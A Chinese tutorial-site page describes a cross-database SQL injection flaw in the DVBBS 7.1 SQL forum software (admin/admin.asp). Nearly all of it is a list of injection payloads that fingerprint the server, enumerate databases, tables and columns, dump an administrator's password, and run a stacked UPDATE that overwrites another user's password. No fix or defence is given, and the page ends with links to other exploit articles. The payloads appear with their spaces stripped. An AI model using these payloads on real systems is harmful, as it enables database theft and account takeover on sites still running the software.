手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >DVBBS7.1 SQL版 跨库漏洞
DVBBS7.1 SQL版 跨库漏洞
摘要:漏洞测试环境:DVBBS7.1SQL受影响文件admin/admin.asp.....漏洞利用(select@@version)>0获得Wi...

漏洞测试环境:DVBBS7.1SQL

受影响文件

admin/admin.asp

.....

漏洞利用

(select@@version)>0获得Windows的版本号

anduser_name()='dbo'判断当前系统的连接用户是不是sa

(selectuser_name())>0爆当前系统的连接用户

(selectdb_name())>0得到当前连接的数据库

(selectIS_MEMBER('db_owner'))--查询数据库当前用户权限

(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=7)---查询所有数据库名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U')--查询数据库表名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U'andnamenotin('web_Admin'))--查询数据库所有表名

(selectcount(*)fromJxSoufun.dbo.sysobjectswherextype='U'andname='web_Admin'anduid>(str(id)))--查询表名ID

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048)--查询字段名

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048andnamenotin('adminname'))--查询所有字段名

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminName>1)-查询用户

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminpwd>1andusername='bluefire')-查询用户bluefire密码

;updateJxSoufun.dbo.Agency_Usersetuserpwd='965eb72c92a549dd'whereusername='mthfc';--

【DVBBS7.1 SQL版 跨库漏洞】相关文章:

rgboard 3.0.12 远程文件包含漏洞

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范

WordPress下载监控插件id参数SQL注入漏洞

BBSXP漏洞再探究

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Flash 0day生成器提供下载

ETP 留言本v1.5爆出漏洞及利用方法

网站程序中非SI漏洞的利用

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

PollVote投票系统漏洞利用

精品推荐
分类导航